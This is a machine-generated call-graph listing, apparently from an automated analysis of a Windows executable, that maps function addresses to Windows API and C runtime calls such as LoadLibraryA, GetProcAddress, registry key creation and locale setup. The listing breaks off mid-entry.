LoadLibraryA 62961->62964 62962->62963 62965 111441de LoadLibraryA 62962->62965 62966 11144217 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 62963->62966 62967 11144209 62963->62967 62964->62958 62965->62963 62968 11144243 10 API calls 62966->62968 62967->62968 62969 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 62968->62969 62970 111442c0 62969->62970 62970->62945 62973 11081e13 _strrchr 62972->62973 62975 11081e2a std::locale::_Init 62973->62975 62976 11081c50 IsDBCSLeadByte 62973->62976 62975->62961 62976->62975 62977 110886c0 62982 11162be0 62977->62982 62983 110886e4 InitializeCriticalSection 62982->62983 62984 11088530 62983->62984 62997 11146710 62984->62997 62986 11088668 62987 11088563 62987->62986 62987->62987 62988 111101b0 std::locale::_Init 274 API calls 62987->62988 62989 110885b9 62988->62989 62990 110885fd 62989->62990 62991 110885e6 62989->62991 63002 110869d0 62990->63002 63031 11029a70 274 API calls 2 library calls 62991->63031 62995 11146710 280 API calls 62996 11088608 62995->62996 62996->62986 62996->62995 62996->62996 63032 111103d0 62997->63032 62999 1114671f 63038 11145660 62999->63038 63003 110869eb 63002->63003 63004 110869ef 63003->63004 63005 11086a00 63003->63005 63006 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 63004->63006 63053 111457a0 63005->63053 63008 110869fc 63006->63008 63008->62996 63009 11086a07 63009->63009 63010 11086a2b LoadLibraryA 63009->63010 63011 11086ac9 GetProcAddress 63010->63011 63012 11086a64 63010->63012 63013 11086b6c 63011->63013 63014 11086ae4 GetProcAddress 63011->63014 63015 11086a6d GetModuleFileNameA 63012->63015 63016 11086ac0 63012->63016 63018 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 63013->63018 63014->63013 63017 11086af5 GetProcAddress 63014->63017 63019 11081e00 std::locale::_Init IsDBCSLeadByte 63015->63019 63016->63011 63016->63013 63017->63013 63020 11086b06 GetProcAddress 63017->63020 63021 11086b7a 63018->63021 63022 11086a8e LoadLibraryA 63019->63022 63020->63013 63023 11086b17 GetProcAddress 63020->63023 63021->62996 63022->63016 63023->63013 63024 11086b28 GetProcAddress 63023->63024 63024->63013 63025 11086b39 GetProcAddress 63024->63025 63025->63013 63026 11086b4a GetProcAddress 63025->63026 63026->63013 63027 11086b5b GetProcAddress 63026->63027 63027->63013 63028 11086b7e 63027->63028 63029 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 63028->63029 63030 11086b90 63029->63030 63030->62996 63033 111103e7 EnterCriticalSection 63032->63033 63034 111103de GetCurrentThreadId 63032->63034 63035 111103fe ___DllMainCRTStartup 63033->63035 63034->63033 63036 11110405 LeaveCriticalSection 63035->63036 63037 11110418 LeaveCriticalSection 63035->63037 63036->62999 63037->62999 63049 110963b0 63038->63049 63041 11145684 wsprintfA 63042 11145697 63041->63042 63043 111456b2 63042->63043 63044 1114569b 63042->63044 63046 111456c3 63043->63046 63052 111452d0 5 API calls __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 63043->63052 63051 11029a70 274 API calls 2 library calls 63044->63051 63046->62987 63050 110963b9 LoadStringA 63049->63050 63050->63041 63050->63042 63052->63046 63054 111457c2 63053->63054 63058 111457d9 std::locale::_Init 63053->63058 63096 11029a70 274 API calls 2 library calls 63054->63096 63057 11145918 63059 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 63057->63059 63058->63057 63060 1114580c GetModuleFileNameA 63058->63060 63061 11145983 63059->63061 63062 11081e00 std::locale::_Init IsDBCSLeadByte 63060->63062 63061->63009 63063 11145821 63062->63063 63063->63057 63064 11145831 SHGetFolderPathA 63063->63064 63065 1114585e 63064->63065 63066 1114587d SHGetFolderPathA 63064->63066 63065->63066 63068 11145864 63065->63068 63069 111458b2 std::locale::_Init 63066->63069 63097 11029a70 274 API calls 2 library calls 63068->63097 63075 1102ad70 63069->63075 63098 11028c10 63075->63098 63077 1102ad7e 63078 11145240 63077->63078 63079 111452ca 63078->63079 63080 1114524b 63078->63080 63079->63057 63080->63079 63081 1114525b GetFileAttributesA 63080->63081 63082 11145275 63081->63082 63083 11145267 63081->63083 63449 11164bb8 63082->63449 63083->63057 63086 11081e00 std::locale::_Init IsDBCSLeadByte 63087 11145286 63086->63087 63088 11145240 std::locale::_Init 67 API calls 63087->63088 63094 111452a3 63087->63094 63089 11145296 63088->63089 63090 111452ac 63089->63090 63091 1114529e 63089->63091 63093 11163aa5 _free 65 API calls 63090->63093 63092 11163aa5 _free 65 API calls 63091->63092 63092->63094 63095 111452b1 CreateDirectoryA 63093->63095 63094->63057 63095->63094 63099 11028c33 63098->63099 63100 1102927b 63098->63100 63101 11028cf0 GetModuleFileNameA 63099->63101 63110 11028c68 63099->63110 63102 11029317 63100->63102 63103 1102932a 63100->63103 63104 11028d11 _strrchr 63101->63104 63105 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 63102->63105 63106 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 63103->63106 63121 11164ead 63104->63121 63107 11029326 63105->63107 63108 1102933b 63106->63108 63107->63077 63108->63077 63111 11164ead std::locale::_Init 142 API calls 63110->63111 63112 11028ceb 63111->63112 63112->63100 63118 110291e5 63112->63118 63124 11163ca7 63112->63124 63130 11164c77 63118->63130 63119 1116558e 84 API calls _LanguageEnumProc@4 63120 11028da0 __mbschr_l 63119->63120 63120->63118 63120->63119 63129 11026d60 65 API calls 3 library calls 63120->63129 63141 11164df1 63121->63141 63123 11164ebf 63123->63112 63125 11163c91 63124->63125 63283 1116450b 63125->63283 63128 11026d60 65 API calls 3 library calls 63128->63120 63129->63120 63131 11164c83 __write 63130->63131 63132 11164c95 63131->63132 63133 11164caa 63131->63133 63354 1116a1af 65 API calls __getptd_noexit 63132->63354 63140 11164ca5 __write 63133->63140 63332 1116be59 63133->63332 63136 11164c9a 63355 1116edc4 __call_reportfault GetCurrentProcess TerminateProcess DecodePointer __write 63136->63355 63140->63100 63143 11164dfd __write 63141->63143 63142 11164e10 63197 1116a1af 65 API calls __getptd_noexit 63142->63197 63143->63142 63145 11164e3d 63143->63145 63158 11172558 63145->63158 63146 11164e15 63198 1116edc4 __call_reportfault GetCurrentProcess TerminateProcess DecodePointer __write 63146->63198 63149 11164e42 63150 11164e56 63149->63150 63151 11164e49 63149->63151 63153 11164e7d 63150->63153 63154 11164e5d 63150->63154 63199 1116a1af 65 API calls __getptd_noexit 63151->63199 63175 111722c1 63153->63175 63200 1116a1af 65 API calls __getptd_noexit 63154->63200 63157 11164e20 __write @_EH4_CallFilterFunc@8 63157->63123 63159 11172564 __write 63158->63159 63201 1117459f 63159->63201 63161 111725ee 63240 1116ac39 63161->63240 63164 11172677 __write 63164->63149 63166 11172572 63166->63161 63173 111725e7 63166->63173 63211 111744dd 63166->63211 63238 1116be9a 66 API calls __lock 63166->63238 63239 1116bf08 LeaveCriticalSection LeaveCriticalSection _doexit 63166->63239 63167 11172603 InitializeCriticalSectionAndSpinCount 63168 11172636 EnterCriticalSection 63167->63168 63169 11172623 63167->63169 63168->63173 63246 11163aa5 63169->63246 63208 11172682 63173->63208 63176 111722e3 63175->63176 63177 111722f7 63176->63177 63188 1117230e 63176->63188 63264 1116a1af 65 API calls __getptd_noexit 63177->63264 63179 111722fc 63265 1116edc4 __call_reportfault GetCurrentProcess TerminateProcess DecodePointer __write 63179->63265 63180 11172511 63261 1117a5c3 63180->63261 63181 111724ff 63270 1116a1af 65 API calls __getptd_noexit 63181->63270 63185 11172504 63271 1116edc4 __call_reportfault GetCurrentProcess TerminateProcess DecodePointer __write 63185->63271 63186 11172307 63186->63157 63188->63181 63196 111724ab 63188->63196 63266 1117a94d 75 API calls __fassign 63188->63266 63190 1117247a 63190->63181 63267 1117a7e7 84 API calls __mbsnbicmp_l 63190->63267 63192 111724a4 63192->63196 63268 1117a7e7 84 API calls __mbsnbicmp_l 63192->63268 63194 111724c3 63194->63196 63269 1117a7e7 84 API calls __mbsnbicmp_l 63194->63269 63196->63180 63196->63181 63197->63146 63198->63157 63199->63157 63200->63157 63202 111745c7 EnterCriticalSection 63201->63202 63203 111745b4 63201->63203 63202->63166 63204 111744dd __mtinitlocknum 64 API calls 63203->63204 63205 111745ba 63204->63205 63205->63202 63252 1116e66a 65 API calls 3 library calls 63205->63252 63253 111744c6 LeaveCriticalSection 63208->63253 63210 11172689 63210->63164 63212 111744e9 __write 63211->63212 63213 11174511 63212->63213 63214 111744f9 63212->63214 63216 1116ac39 __malloc_crt 64 API calls 63213->63216 63222 1117451f __write 63213->63222 63254 1116e85d 65 API calls __NMSG_WRITE 63214->63254 63218 1117452a 63216->63218 63217 111744fe 63255 1116e6ae 65 API calls 5 library calls 63217->63255 63220 11174531 63218->63220 63221 11174540 63218->63221 63257 1116a1af 65 API calls __getptd_noexit 63220->63257 63225 1117459f __lock 64 API calls 63221->63225 63222->63166 63223 11174505 63256 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 63223->63256 63228 11174547 63225->63228 63229 1117454f InitializeCriticalSectionAndSpinCount 63228->63229 63230 1117457a 63228->63230 63232 1117455f 63229->63232 63237 1117456b 63229->63237 63231 11163aa5 _free 64 API calls 63230->63231 63231->63237 63233 11163aa5 _free 64 API calls 63232->63233 63235 11174565 63233->63235 63258 1116a1af 65 API calls __getptd_noexit 63235->63258 63259 11174596 LeaveCriticalSection _doexit 63237->63259 63238->63166 63239->63166 63242 1116ac42 63240->63242 63241 11163a11 _malloc 64 API calls 63241->63242 63242->63241 63243 1116ac78 63242->63243 63244 1116ac59 Sleep 63242->63244 63243->63167 63243->63173 63245 1116ac6e 63244->63245 63245->63242 63245->63243 63247 11163ab0 HeapFree 63246->63247 63251 11163ad9 _free 63246->63251 63248 11163ac5 63247->63248 63247->63251 63260 1116a1af 65 API calls __getptd_noexit 63248->63260 63250 11163acb GetLastError 63250->63251 63251->63173 63253->63210 63254->63217 63255->63223 63257->63222 63258->63237 63259->63222 63260->63250 63272 1117a4ff 63261->63272 63263 1117a5de 63263->63186 63264->63179 63265->63186 63266->63190 63267->63192 63268->63194 63269->63196 63270->63185 63271->63186 63274 1117a50b __write 63272->63274 63273 1117a51e 63275 1116a1af __write 65 API calls 63273->63275 63274->63273 63277 1117a554 63274->63277 63276 1117a523 63275->63276 63278 1116edc4 __write __call_reportfault GetCurrentProcess TerminateProcess DecodePointer 63276->63278 63279 11179dcb __tsopen_nolock 129 API calls 63277->63279 63282 1117a52d __write 63278->63282 63280 1117a56e 63279->63280 63281 1117a595 __wsopen_helper LeaveCriticalSection 63280->63281 63281->63282 63282->63263 63284 11164524 63283->63284 63287 111642e0 63284->63287 63299 11164259 63287->63299 63289 11164304 63307 1116a1af 65 API calls __getptd_noexit 63289->63307 63292 11164309 63308 1116edc4 __call_reportfault GetCurrentProcess TerminateProcess DecodePointer __write 63292->63308 63295 1116433a 63296 11164381 63295->63296 63309 11171a63 77 API calls _LocaleUpdate::_LocaleUpdate 63295->63309 63298 11028d75 63296->63298 63310 1116a1af 65 API calls __getptd_noexit 63296->63310 63298->63118 63298->63128 63300 1116426c 63299->63300 63306 111642b9 63299->63306 63311 1116c675 63300->63311 63303 11164299 63303->63306 63331 111715a2 67 API calls 6 library calls 63303->63331 63306->63289 63306->63295 63307->63292 63308->63298 63309->63295 63310->63298 63312 1116c5fc __getptd_noexit 65 API calls 63311->63312 63313 1116c67d 63312->63313 63314 1116e66a __amsg_exit 65 API calls 63313->63314 63315 11164271 63313->63315 63314->63315 63315->63303 63316 11171306 63315->63316 63317 11171312 __write 63316->63317 63318 1116c675 __getptd 65 API calls 63317->63318 63319 11171317 63318->63319 63320 11171345 63319->63320 63322 11171329 63319->63322 63321 1117459f __lock 65 API calls 63320->63321 63323 1117134c 63321->63323 63324 1116c675 __getptd 65 API calls 63322->63324 63325 111712b9 __updatetlocinfoEx_nolock 73 API calls 63323->63325 63326 1117132e 63324->63326 63327 11171360 63325->63327 63329 1117133c __write 63326->63329 63330 1116e66a __amsg_exit 65 API calls 63326->63330 63328 11171373 ___pctype_func LeaveCriticalSection 63327->63328 63328->63326 63329->63303 63330->63329 63331->63306 63333 1116be8d EnterCriticalSection 63332->63333 63334 1116be6b 63332->63334 63336 11164cc3 63333->63336 63334->63333 63335 1116be73 63334->63335 63337 1117459f __lock 65 API calls 63335->63337 63338 11164c0a 63336->63338 63337->63336 63339 11164c2f 63338->63339 63340 11164c1b 63338->63340 63347 11164c2b 63339->63347 63356 1116bf37 63339->63356 63396 1116a1af 65 API calls __getptd_noexit 63340->63396 63343 11164c20 63397 1116edc4 __call_reportfault GetCurrentProcess TerminateProcess DecodePointer __write 63343->63397 63347->63140 63350 11164c49 63373 11171e64 63350->63373 63352 11164c4f 63352->63347 63353 11163aa5 _free 65 API calls 63352->63353 63353->63347 63354->63136 63355->63140 63357 1116bf50 63356->63357 63358 11164c3b 63356->63358 63357->63358 63359 1116a147 __ftell_nolock 65 API calls 63357->63359 63362 11171f28 63358->63362 63360 1116bf6b 63359->63360 63398 111730a4 97 API calls 3 library calls 63360->63398 63363 11164c43 63362->63363 63364 11171f38 63362->63364 63366 1116a147 63363->63366 63364->63363 63365 11163aa5 _free 65 API calls 63364->63365 63365->63363 63367 1116a153 63366->63367 63368 1116a168 63366->63368 63399 1116a1af 65 API calls __getptd_noexit 63367->63399 63368->63350 63370 1116a158 63400 1116edc4 __call_reportfault GetCurrentProcess TerminateProcess DecodePointer __write 63370->63400 63372 1116a163 63372->63350 63374 11171e70 __write 63373->63374 63375 11171e93 63374->63375 63376 11171e78 63374->63376 63377 11171e9f 63375->63377 63382 11171ed9 63375->63382 63426 1116a1c2 65 API calls __getptd_noexit 63376->63426 63428 1116a1c2 65 API calls __getptd_noexit 63377->63428 63380 11171e7d 63427 1116a1af 65 API calls __getptd_noexit 63380->63427 63381 11171ea4 63429 1116a1af 65 API calls __getptd_noexit 63381->63429 63401 111778c4 63382->63401 63386 11171eac 63430 1116edc4 __call_reportfault GetCurrentProcess TerminateProcess DecodePointer __write 63386->63430 63387 11171edf 63389 11171eed 63387->63389 63390 11171ef9 63387->63390 63411 11171dc8 63389->63411 63431 1116a1af 65 API calls __getptd_noexit 63390->63431 63392 11171e85 __write 63392->63352 63394 11171ef3 63432 11171f20 LeaveCriticalSection __unlock_fhandle 63394->63432 63396->63343 63397->63347 63398->63358 63399->63370 63400->63372 63402 111778d0 __write 63401->63402 63403 1117792a 63402->63403 63406 1117459f __lock 65 API calls 63402->63406 63404 1117792f EnterCriticalSection 63403->63404 63405 1117794c __write 63403->63405 63404->63405 63405->63387 63407 111778fc 63406->63407 63408 11177905 InitializeCriticalSectionAndSpinCount 63407->63408 63409 11177918 63407->63409 63408->63409 63433 1117795a LeaveCriticalSection _doexit 63409->63433 63434 1117785b 63411->63434 63413 11171e2e 63447 111777d5 66 API calls __write 63413->63447 63415 11171dd8 63415->63413 63416 11171e0c 63415->63416 63419 1117785b __chsize_nolock 65 API calls 63415->63419 63416->63413 63417 1117785b __chsize_nolock 65 API calls 63416->63417 63422 11171e03 63419->63422 63426->63380 63427->63392 63428->63381 63429->63386 63430->63392 63431->63394 63432->63392 63433->63403 63435 11177868 63434->63435 63438 11177880 63434->63438 63436 1116a1c2 __write 65 API calls 63435->63436 63437 1117786d 63436->63437 63441 1116a1af __write 65 API calls 63437->63441 63439 1116a1c2 __write 65 API calls 63438->63439 63440 111778bf 63438->63440 63442 11177891 63439->63442 63440->63415 63443 11177875 63441->63443 63444 1116a1af __write 65 API calls 63442->63444 63443->63415 63445 11177899 63444->63445 63450 1114527c 63449->63450 63451 11164bc9 _strlen 63449->63451 63450->63086 63452 11163a11 _malloc 65 API calls 63451->63452 63453 11164bdc 63452->63453 63453->63450 63457 1116cd5f 63453->63457 63458 1116cd74 63457->63458 63459 1116cd6d 63457->63459 63467 1116a1af 65 API calls __getptd_noexit 63458->63467 63459->63458 63463 1116cd92 63459->63463 63461 1116cd79 63468 1116edc4 __call_reportfault GetCurrentProcess TerminateProcess DecodePointer __write 63461->63468 63464 11164bee 63463->63464 63469 1116a1af 65 API calls __getptd_noexit 63463->63469 63464->63450 63466 1116ed72 __call_reportfault GetCurrentProcess TerminateProcess 63464->63466 63466->63450 63467->63461 63468->63464 63469->63461 63470 11174898 63471 1116c675 __getptd 65 API calls 63470->63471 63472 111748b5 _LcidFromHexString 63471->63472 63473 111748c2 GetLocaleInfoA 63472->63473 63474 111748f5 63473->63474 63475 111748e9 63473->63475 63498 1116558e 84 API calls 2 library calls 63474->63498 63477 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 63475->63477 63479 11174a65 63477->63479 63478 11174901 63480 1117490b GetLocaleInfoA 63478->63480 63497 1117493b _LangCountryEnumProc@4 63478->63497 63480->63475 63482 1117492a 63480->63482 63481 111749ae GetLocaleInfoA 63481->63475 63484 111749d1 63481->63484 63499 1116558e 84 API calls 2 library calls 63482->63499 63501 1116558e 84 API calls 2 library calls 63484->63501 63486 111749dc 63488 11174a14 63486->63488 63489 111749e4 63486->63489 63487 11174935 63487->63497 63500 11164644 84 API calls 2 library calls 63487->63500 63488->63475 63502 1116558e 84 API calls 2 library calls 63488->63502 63489->63475 63491 11174a02 _strlen 63489->63491 63491->63475 63495 11174a0f 63491->63495 63492 11174960 63494 11174967 _strlen 63492->63494 63492->63497 63494->63497 63495->63475 63503 1117483d GetLocaleInfoW _strlen _GetPrimaryLen 63495->63503 63497->63475 63497->63481 63498->63478 63499->63487 63500->63492 63501->63486 63502->63495 63503->63475 63504 11030ef3 RegOpenKeyExA 63505 11030f20 63504->63505 63506 1103103d 63504->63506 63582 11143bd0 RegQueryValueExA 63505->63582 63509 11031061 63506->63509 63510 11031145 63506->63510 63512 111101b0 std::locale::_Init 274 API calls 63509->63512 63513 111101b0 std::locale::_Init 274 API calls 63510->63513 63511 11031030 RegCloseKey 63511->63506 63518 11031088 63512->63518 63513->63518 63514 11163ca7 std::locale::_Init 77 API calls 63515 11030f5e 63514->63515 63516 111648ed std::locale::_Init 77 API calls 63515->63516 63517 11030f6d 63516->63517 63519 11030f86 63517->63519 63521 111648ed std::locale::_Init 77 API calls 63517->63521 63520 110312db GetStockObject GetObjectA 63518->63520 63523 11163ca7 std::locale::_Init 77 API calls 63519->63523 63522 1103130a SetErrorMode SetErrorMode 63520->63522 63521->63517 63525 111101b0 std::locale::_Init 274 API calls 63522->63525 63527 11030f92 63523->63527 63526 11031346 63525->63526 63584 11028980 63526->63584 63527->63511 63528 11143bd0 std::locale::_Init RegQueryValueExA 63527->63528 63531 11030fe8 63528->63531 63530 11031360 63533 111101b0 std::locale::_Init 274 API calls 63530->63533 63532 11143bd0 std::locale::_Init RegQueryValueExA 63531->63532 63534 11031011 63532->63534 63535 11031386 63533->63535 63534->63511 63536 11028980 278 API calls 63535->63536 63537 1103139f InterlockedExchange 63536->63537 63539 111101b0 std::locale::_Init 274 API calls 63537->63539 63540 110313c7 63539->63540 63587 1108a880 63540->63587 63542 110313df GetACP 63598 11163f93 63542->63598 63547 11031410 63645 11143780 63547->63645 63550 111101b0 std::locale::_Init 274 API calls 63551 1103145c 63550->63551 63651 11061aa0 63551->63651 63553 110314d4 63557 111101b0 std::locale::_Init 274 API calls 63553->63557 63555 111101b0 std::locale::_Init 274 API calls 63556 110314ae 63555->63556 63712 11061710 63556->63712 63559 11031501 63557->63559 63668 11125d40 63559->63668 63561 11031523 63562 111101b0 std::locale::_Init 274 API calls 63561->63562 63563 1103155b 63562->63563 63677 11088b30 63563->63677 63583 11030f4a 63582->63583 63583->63511 63583->63514 63585 11088b30 278 API calls 63584->63585 63586 1102898b _memset 63585->63586 63586->63530 63588 111101b0 std::locale::_Init 274 API calls 63587->63588 63589 1108a8b7 63588->63589 63590 1108a8d9 InitializeCriticalSection 63589->63590 63591 111101b0 std::locale::_Init 274 API calls 63589->63591 63594 1108a93a 63590->63594 63593 1108a8d2 63591->63593 63593->63590 63725 1116305a std::exception::_Copy_str 63593->63725 63594->63542 63596 1108a909 63726 111634b1 RaiseException 63596->63726 63599 11163fc6 63598->63599 63600 11163fb1 63598->63600 63599->63600 63601 11163fcd 63599->63601 63727 1116a1af 65 API calls __getptd_noexit 63600->63727 63729 1117027b 104 API calls 9 library calls 63601->63729 63604 11163fb6 63728 1116edc4 __call_reportfault GetCurrentProcess TerminateProcess DecodePointer __write 63604->63728 63605 11163ff3 63607 11031406 63605->63607 63730 111700e4 97 API calls 6 library calls 63605->63730 63609 111663a3 63607->63609 63610 111663af __write 63609->63610 63611 111663d0 63610->63611 63612 111663b9 63610->63612 63614 1116c675 __getptd 65 API calls 63611->63614 63763 1116a1af 65 API calls __getptd_noexit 63612->63763 63616 111663d5 63614->63616 63615 111663be 63764 1116edc4 __call_reportfault GetCurrentProcess TerminateProcess DecodePointer __write 63615->63764 63618 11171306 ___pctype_func 73 API calls 63616->63618 63619 111663df 63618->63619 63731 1116ac7e 63619->63731 63622 111663c9 __write _setlocale 63622->63547 63623 1117459f __lock 65 API calls 63624 1116640b 63623->63624 63737 11165814 63624->63737 63631 111664ec 63769 111710d5 8 API calls 63631->63769 63632 1116643b __setlocale_nolock 63635 1117459f __lock 65 API calls 63632->63635 63634 111664f2 63770 1117116e 65 API calls 4 library calls 63634->63770 63637 11166461 63635->63637 63765 111712b9 73 API calls 3 library calls 63637->63765 63639 11166473 63766 111710d5 8 API calls 63639->63766 63641 11166479 63644 11166497 63641->63644 63767 111712b9 73 API calls 3 library calls 63641->63767 63768 111664e1 LeaveCriticalSection _doexit 63644->63768 63955 11143690 63645->63955 63647 11166654 84 API calls std::locale::_Init 63649 11143795 63647->63649 63648 11143690 2 API calls 63648->63649 63649->63647 63649->63648 63650 1103143c 63649->63650 63650->63550 63652 11061710 304 API calls 63651->63652 63653 11061ade 63652->63653 63654 111101b0 std::locale::_Init 274 API calls 63653->63654 63655 11061b0b 63654->63655 63656 11061b24 63655->63656 63657 11061710 304 API calls 63655->63657 63658 111101b0 std::locale::_Init 274 API calls 63656->63658 63657->63656 63659 11061b35 63658->63659 63660 11061710 304 API calls 63659->63660 63662 11061b4e 63659->63662 63660->63662 63661 11031487 63661->63553 63661->63555 63662->63661 63969 11061a70 63662->63969 63669 111101b0 std::locale::_Init 274 API calls 63668->63669 63670 11125d74 63669->63670 63671 11125da5 63670->63671 63672 11125d8a 63670->63672 63675 11125e08 63671->63675 64105 110717d0 278 API calls std::locale::_Init 63671->64105 64104 110765c0 477 API calls std::locale::_Init 63672->64104 63674 11125d9a 63674->63671 63675->63561 63713 111101b0 std::locale::_Init 274 API calls 63712->63713 63714 11061761 63713->63714 63715 11061777 InitializeCriticalSection 63714->63715 64451 11061210 276 API calls 3 library calls 63714->64451 63718 110617b7 63715->63718 63723 11061826 63715->63723 64452 1105f830 297 API calls 3 library calls 63718->64452 63720 110617d8 RegCreateKeyExA 63721 11061832 RegCreateKeyExA 63720->63721 63722 110617ff RegCreateKeyExA 63720->63722 63721->63723 63724 11061865 RegCreateKeyExA 63721->63724 63722->63721 63722->63723 63723->63553 63724->63723 63725->63596 63726->63590 63727->63604 63728->63607 63729->63605 63730->63607 63734 1116ac87 63731->63734 63733 111663f5 63733->63622 63733->63623 63734->63733 63735 1116aca5 Sleep 63734->63735 63771 11170fc4 63734->63771 63736 1116acba 63735->63736 63736->63733 63736->63734 63738 1116581d 63737->63738 63739 11165836 63737->63739 63738->63739 63782 11171046 8 API calls 63738->63782 63741 111664d5 63739->63741 63783 111744c6 LeaveCriticalSection 63741->63783 63743 11166422 63744 11166187 63743->63744 63745 111661b0 63744->63745 63751 111661cb 63744->63751 63747 111661ba 63745->63747 63750 11165e4d __setlocale_set_cat 112 API calls 63745->63750 63746 111662f5 63746->63747 63848 11165ac7 63746->63848 63753 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 63747->63753 63748 1116631c 63784 11165c2c 63748->63784 63750->63747 63751->63746 63751->63748 63759 11166200 _strpbrk _strncmp _strcspn 63751->63759 63754 111663a1 63753->63754 63754->63631 63754->63632 63755 11166331 __setlocale_nolock 63755->63746 63755->63747 63801 11165e4d 63755->63801 63757 11166257 _strlen 63757->63759 63759->63746 63759->63747 63759->63757 63760 1116630e 63759->63760 63762 11165e4d __setlocale_set_cat 112 API calls 63759->63762 63877 111699f9 65 API calls __write 63759->63877 63878 1116ed72 __call_reportfault GetCurrentProcess TerminateProcess 63760->63878 63762->63759 63763->63615 63764->63622 63765->63639 63766->63641 63767->63644 63768->63622 63769->63634 63770->63622 63772 11170fd0 63771->63772 63778 11170feb 63771->63778 63773 11170fdc 63772->63773 63772->63778 63780 1116a1af 65 API calls __getptd_noexit 63773->63780 63775 11170ffe RtlAllocateHeap 63777 11171025 63775->63777 63775->63778 63776 11170fe1 63776->63734 63777->63734 63778->63775 63778->63777 63781 1116e368 DecodePointer 63778->63781 63780->63776 63781->63778 63782->63739 63783->63743 63785 1116c675 __getptd 65 API calls 63784->63785 63786 11165c67 63785->63786 63788 11165d07 _strlen 63786->63788 63790 1116cd5f _strcpy_s 65 API calls 63786->63790 63796 11165cd4 63786->63796 63787 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 63789 11165e4b 63787->63789 63792 11165ccd __setlocale_nolock 63788->63792 63789->63755 63790->63792 63793 11165de0 _memmove 63792->63793 63795 11165df9 _memmove 63792->63795 63792->63796 63798 1116cd5f _strcpy_s 65 API calls 63792->63798 63879 1116593d 63792->63879 63886 11174bcc 63792->63886 63921 1116ed72 __call_reportfault GetCurrentProcess TerminateProcess 63792->63921 63922 11165a5c 65 API calls 3 library calls 63792->63922 63923 111699f9 65 API calls __write 63792->63923 63793->63792 63795->63792 63796->63787 63798->63792 63802 1116c675 __getptd 65 API calls 63801->63802 63803 11165e7a 63802->63803 63804 11165c2c __expandlocale 102 API calls 63803->63804 63806 11165ea2 __setlocale_nolock 63804->63806 63805 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 63807 11165eb7 63805->63807 63808 11165ea9 63806->63808 63809 11165ed8 _strlen 63806->63809 63807->63755 63808->63805 63810 1116ac39 __malloc_crt 65 API calls 63809->63810 63811 11165ef3 63810->63811 63811->63808 63812 11165eff _memmove 63811->63812 63813 1116cd5f _strcpy_s 65 API calls 63812->63813 63814 11165f66 63813->63814 63815 11165f71 _memmove 63814->63815 63830 11166155 63814->63830 63849 1116ac39 __malloc_crt 65 API calls 63848->63849 63850 11165ae0 63849->63850 63867 11165bb8 63850->63867 63951 111658fc 65 API calls 2 library calls 63850->63951 63853 11165bce 63954 1116ed72 __call_reportfault GetCurrentProcess TerminateProcess 63853->63954 63855 11165bda 63857 11163aa5 _free 65 API calls 63855->63857 63856 11165b11 __setlocale_nolock 63856->63853 63861 11165b7f 63856->63861 63952 111745d2 65 API calls __write 63856->63952 63953 111658fc 65 API calls 2 library calls 63856->63953 63859 11165be2 63857->63859 63860 11165bf2 InterlockedDecrement 63859->63860 63870 11165c01 63859->63870 63862 11165bf9 63860->63862 63860->63870 63861->63855 63864 11165b85 63861->63864 63865 11163aa5 _free 65 API calls 63862->63865 63863 11165c09 InterlockedDecrement 63866 11165c10 63863->63866 63863->63867 63868 11165ba1 63864->63868 63869 11165b92 InterlockedDecrement 63864->63869 63865->63870 63871 11163aa5 _free 65 API calls 63866->63871 63867->63747 63868->63867 63873 11165ba9 InterlockedDecrement 63868->63873 63869->63868 63872 11165b99 63869->63872 63870->63863 63870->63867 63871->63867 63874 11163aa5 _free 65 API calls 63872->63874 63873->63867 63875 11165bb0 63873->63875 63874->63868 63876 11163aa5 _free 65 API calls 63875->63876 63876->63867 63877->63759 63878->63747 63881 11165956 _memset 63879->63881 63880 11165962 63880->63792 63881->63880 63884 11165985 _strcspn 63881->63884 63924 111699f9 65 API calls __write 63881->63924 63884->63880 63925 1116ed72 __call_reportfault GetCurrentProcess TerminateProcess 63884->63925 63926 111699f9 65 API calls __write 63884->63926 63887 1116c675 __getptd 65 API calls 63886->63887 63890 11174bd9 63887->63890 63888 11174be6 GetUserDefaultLCID 63900 11174c6d 63888->63900 63890->63888 63896 11174c10 63890->63896 63937 1117463f 84 API calls _LanguageEnumProc@4 63890->63937 63891 11174c78 63891->63888 63894 11174c83 _strlen EnumSystemLocalesA 63891->63894 63893 11174c22 63898 11174c36 63893->63898 63899 11174c2d 63893->63899 63894->63900 63896->63891 63896->63893 63897 11174dae 63897->63792 63942 11174b90 _strlen EnumSystemLocalesA _GetPrimaryLen 63898->63942 63938 11174b29 _strlen _strlen 63899->63938 63900->63897 63927 111746a1 63900->63927 63902 11174cde 63902->63897 63906 11174d03 IsValidCodePage 63902->63906 63904 11174c34 63904->63900 63943 1117463f 84 API calls _LanguageEnumProc@4 63904->63943 63906->63897 63908 11174d15 IsValidLocale 63906->63908 63907 11174c54 63907->63900 63909 11174c6f 63907->63909 63910 11174c66 63907->63910 63908->63897 63913 11174d28 63908->63913 63944 11174b90 _strlen EnumSystemLocalesA _GetPrimaryLen 63909->63944 63914 11174b29 _GetLcidFromLangCountry 3 API calls 63910->63914 63912 11174d79 GetLocaleInfoA 63912->63897 63916 11174d8a GetLocaleInfoA 63912->63916 63913->63897 63913->63912 63915 1116cd5f _strcpy_s 65 